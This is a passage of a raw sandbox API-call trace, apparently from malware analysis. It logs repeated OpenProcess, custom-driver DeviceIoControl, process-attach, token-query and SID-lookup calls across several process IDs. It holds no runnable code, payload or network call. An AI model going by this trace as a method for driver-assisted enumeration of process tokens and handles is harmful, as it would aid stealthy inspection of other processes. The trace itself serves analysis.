lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.923] PsLookupProcessByProcessId (in: ProcessId=0x688, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.923] PsAcquireProcessExitSynchronization () returned 0x0 [0245.923] KeStackAttachProcess (in: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880053c85d0) [0245.923] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.923] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.923] PsReleaseProcessExitSynchronization () returned 0x2 [0245.923] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x12 [0245.923] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.923] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.923] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.923] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0xc8 [0245.923] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.923] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f52310, HandleInformation=0x0) returned 0x0 [0245.923] ObOpenObjectByPointer (in: Object=0xfffffa8001f52310, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.923] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x14 [0245.923] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.923] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.924] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.924] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.924] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.926] CloseHandle (hObject=0xc4) returned 1 [0245.926] CloseHandle (hObject=0xc8) returned 1 [0245.926] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.926] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.926] PsLookupProcessByProcessId (in: ProcessId=0x414, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.926] PsAcquireProcessExitSynchronization () returned 0x0 [0245.926] KeStackAttachProcess (in: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880053c85d0) [0245.926] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8010db15d0, HandleInformation=0x0) returned 0x0 [0245.926] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.926] PsReleaseProcessExitSynchronization () returned 0x2 [0245.926] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x12 [0245.927] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.927] ObfDereferenceObject (Object=0xfffffa8010db15d0) returned 0x1 [0245.927] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.927] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.927] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.927] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0245.927] PsLookupProcessByProcessId (in: ProcessId=0x414, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.927] PsAcquireProcessExitSynchronization () returned 0x0 [0245.927] KeStackAttachProcess (in: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880053c85d0) [0245.927] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8010b054b0, HandleInformation=0x0) returned 0x0 [0245.927] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.927] PsReleaseProcessExitSynchronization () returned 0x2 [0245.927] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x12 [0245.927] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.927] ObfDereferenceObject (Object=0xfffffa8010b054b0) returned 0x1 [0245.927] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.927] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.927] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.927] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.927] PsLookupProcessByProcessId (in: ProcessId=0x414, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.927] PsAcquireProcessExitSynchronization () returned 0x0 [0245.927] KeStackAttachProcess (in: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880053c85d0) [0245.927] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.927] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.928] PsReleaseProcessExitSynchronization () returned 0x2 [0245.928] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x12 [0245.928] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.928] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.928] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.928] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x90) returned 0xc8 [0245.928] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.928] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f6c060, HandleInformation=0x0) returned 0x0 [0245.928] ObOpenObjectByPointer (in: Object=0xfffffa8001f6c060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.928] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x14 [0245.928] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.928] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.928] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.928] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.928] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.930] CloseHandle (hObject=0xc4) returned 1 [0245.930] CloseHandle (hObject=0xc8) returned 1 [0245.930] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.930] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.930] PsLookupProcessByProcessId (in: ProcessId=0x90, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.930] PsAcquireProcessExitSynchronization () returned 0x0 [0245.930] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880053c85d0) [0245.930] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800adfd7a0, HandleInformation=0x0) returned 0x0 [0245.930] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.930] PsReleaseProcessExitSynchronization () returned 0x2 [0245.931] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x12 [0245.931] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.931] ObfDereferenceObject (Object=0xfffffa800adfd7a0) returned 0x1 [0245.931] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.931] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.931] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.931] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0245.931] PsLookupProcessByProcessId (in: ProcessId=0x90, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.931] PsAcquireProcessExitSynchronization () returned 0x0 [0245.931] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880053c85d0) [0245.931] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800dbf7df0, HandleInformation=0x0) returned 0x0 [0245.931] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.931] PsReleaseProcessExitSynchronization () returned 0x2 [0245.931] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x12 [0245.931] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.931] ObfDereferenceObject (Object=0xfffffa800dbf7df0) returned 0x1 [0245.931] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.931] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.931] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.931] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.931] PsLookupProcessByProcessId (in: ProcessId=0x90, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.931] PsAcquireProcessExitSynchronization () returned 0x0 [0245.931] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880053c85d0) [0245.931] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.931] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.932] PsReleaseProcessExitSynchronization () returned 0x2 [0245.932] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x12 [0245.932] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.932] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.932] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.932] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xc8 [0245.932] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.932] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001fc2b30, HandleInformation=0x0) returned 0x0 [0245.932] ObOpenObjectByPointer (in: Object=0xfffffa8001fc2b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.932] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x14 [0245.932] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.932] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.932] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.932] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.932] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.934] CloseHandle (hObject=0xc4) returned 1 [0245.934] CloseHandle (hObject=0xc8) returned 1 [0245.934] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.934] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.934] PsLookupProcessByProcessId (in: ProcessId=0x780, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.934] PsAcquireProcessExitSynchronization () returned 0x0 [0245.934] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880053c85d0) [0245.934] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fc2070, HandleInformation=0x0) returned 0x0 [0245.934] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.934] PsReleaseProcessExitSynchronization () returned 0x2 [0245.934] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x12 [0245.934] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.934] ObfDereferenceObject (Object=0xfffffa8001fc2070) returned 0x1 [0245.934] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.935] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.935] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.935] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0245.935] PsLookupProcessByProcessId (in: ProcessId=0x780, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.935] PsAcquireProcessExitSynchronization () returned 0x0 [0245.935] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880053c85d0) [0245.935] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020102e0, HandleInformation=0x0) returned 0x0 [0245.935] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.935] PsReleaseProcessExitSynchronization () returned 0x2 [0245.935] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x12 [0245.935] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.935] ObfDereferenceObject (Object=0xfffffa80020102e0) returned 0x1 [0245.935] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.935] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.935] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.935] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.935] PsLookupProcessByProcessId (in: ProcessId=0x780, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.935] PsAcquireProcessExitSynchronization () returned 0x0 [0245.935] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880053c85d0) [0245.935] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.935] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.935] PsReleaseProcessExitSynchronization () returned 0x2 [0245.935] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x12 [0245.935] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.935] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.935] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.936] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x208) returned 0xc8 [0245.936] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.936] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800201ea90, HandleInformation=0x0) returned 0x0 [0245.936] ObOpenObjectByPointer (in: Object=0xfffffa800201ea90, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.936] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x14 [0245.936] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.936] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.936] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.936] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.936] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.938] CloseHandle (hObject=0xc4) returned 1 [0245.938] CloseHandle (hObject=0xc8) returned 1 [0245.938] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.938] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, 